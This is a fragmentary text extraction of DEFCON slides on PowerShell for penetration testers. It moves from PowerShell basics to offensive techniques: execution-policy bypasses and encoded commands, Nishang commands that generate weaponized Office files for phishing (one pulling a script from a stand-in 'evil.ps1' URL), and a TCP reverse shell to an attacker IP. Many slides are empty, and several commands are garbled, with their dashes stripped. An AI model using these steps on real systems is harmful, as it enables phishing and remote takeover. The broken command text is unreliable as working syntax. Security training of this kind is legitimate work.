Académique Documents
Professionnel Documents
Culture Documents
for
Penetration Testers
Nikhil Mittal
Get-Host
Hacker, Trainer, Speaker, Penetration
Tester
Creator of Kautilya and Nishang.
Twitter: @nikhil_mitt
Blog http://labofapenetrationtester.com
Interested in Offensive Information
Security, new attack vectors and
methodologies to pwn systems.
Previous talks:
Defcon, Blackhat, Troopers, DeepSec,
EuSecwest, Hackfest, PHDays etc.
$PFPTLab = Get-Content
What is PowerShell
Why PowerShell
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
2
Wall of Sheep
$PFPTLab | where-object
{$_ -eq
What is PowerShell"}
Windows PowerShell is a task-based
commandline shell and scripting
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
3
Wall of Sheep
$PFPTLab | where-object
{$_ -eq
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
4
Wall of Sheep
Why PowerShell"}
Present by default on modern Windows
OS.
Tightly integrated with Windows and
allows interaction with .Net, Filesystem,
Registry, API, Certificates, COM, native
commands, network, domain etc.
Expandable with use of .Net framework.
Easy to learn.
Less dependency on *nix based tools.
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
5
Wall of Sheep
about_PowerShell.exe
powershell.exe is the console part of
PowerShell.
Execute native commands, cmdlets,
functions and scripts.
Supports tab completion, command
aliases, Operators etc.
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
6
Wall of Sheep
parameters.
PowerShell.
Execute native commands, cmdlets,
functions and scripts.
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
7
Wall of Sheep
Get-Help Get-Help
Easy to use and very useful.
This is the first place to go for learning
something new or looking for solution
to a problem.
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
8
Wall of Sheep
Get-Help Get-Help
Use with about_* to list help about a
conceptual topic.
Various parameters could be passed to
Get-Help
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
9
Wall of Sheep
10
Wall of Sheep
11
Wall of Sheep
cmdlets"}
Explore cmdlets
Get-Command CommandType
Cmdlet
Explore cmdlets based on a verb GetCommand Verb Get
Get-Command also supports wildcards.
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
12
Wall of Sheep
about_Windows_PowerShell
_ISE
A GUI Scripting environment.
Tab completion, context-sensitive help,
syntax highlighting, selective
execution, in-line help are some of the
useful features.
PowerShell scripts have .ps1
extension.
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
13
Wall of Sheep
about_Execution_Policies
14
Wall of Sheep
15
Wall of Sheep
about_Execution_Policies
Execution Policy is present to stop a user from
accidently running scripts.
There are numerous ways to bypass it:
powershell.exe ExecutionPolicy bypass
.\script.ps1 powershell.exe
EncodedCommand <> powershell.exe
c <>
Read: 15 ways to bypass PowerShell execution
policy
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
16
Wall of Sheep
https://www.netspi.com/blog/entryid/238/15ways-tobypass-the-powershell-execution-policy
17
Wall of Sheep
18
Wall of Sheep
PenTest Scenario"}
19
Wall of Sheep
20
Wall of Sheep
21
Wall of Sheep
22
Wall of Sheep
23
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Client Side Attacks"}
PowerShell is an ideal tool for client side
attacks on a Windows platform.
It could be used for generating
weaponized files for email phishing
campaigns and drive by download
attacks.
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
24
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Lets use Client Side attack scripts from
Nishang
(https://github.com/samratashok/nisha
ng)
The targets for Client Side Attacks mimic
human targets They open links and
attachments emailed to them.
25
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Generating weaponized MS Office Files
Out-Word -Payload "powershell.exe
ExecutionPolicy Bypass -noprofile noexit
-c Get-Process
Out-Word -PayloadURL
http://yourwebserver.com/evil.ps1
26
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Out-Excel -Payload "powershell.exe
EncodedCommand <>
27
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Out-CHM
Out-Shortcut
Shells"}
Now that we can run successful client
28
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Shells in PowerShell can be used with
Shells"}
Lets use a TCP reverse shell,
InvokePowerShellTcp.ps1 from Nishang.
It also has a one-line version.
On Windows target:
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
29
Wall of Sheep
$Exploitation | where-object
{$_ -eq
Invoke-PowerShellTcp IPAddress
192.168.230.1 Port 443
Use Invoke-Encode from Nishang to
encode Invoke-PowerShellTcp and use it
with a Client Side Attack.
30
Wall of Sheep
31
Wall of Sheep
32
Wall of Sheep
Framework/PowerTools/tree/master/P
ower View) to enumerate the target
domain.
The goal is to find a machine where a
Domain Admin is logged in.
33
Wall of Sheep
34
Wall of Sheep
35
Wall of Sheep
SQL
Server Exploitation"}
Execute PowerShell commands or SQL
queries on the target instance:
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
36
Wall of Sheep
Priv
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
37
Wall of Sheep
38
Wall of Sheep
39
Wall of Sheep
40
Wall of Sheep
Credits"}
Credits/FF to PowerShell hackers (in
no particular order)
@subTee,
@nullbind,@bettersafetynet,
@obscuresec, @mattifestation,
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
41
Wall of Sheep
Closing Remarks"}
42
Wall of Sheep
Feedback"}
Check out PowerShell for Penetration
Testers two days trainings at:
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
43
Wall of Sheep
http://www.labofapenetrationtester.c
om/p/tr ainings.html#pfptschedule
Nishang is available at
https://github.com/samratashok/nishan
g
Follow me @nikhil_mitt
nikhil.uitrgpv@gmail.com
http://labofapenetrationtester.com/
PowerShell for Penetration Testers DEFCON
@nikhil_mitt
44
Wall of Sheep
45
Wall of Sheep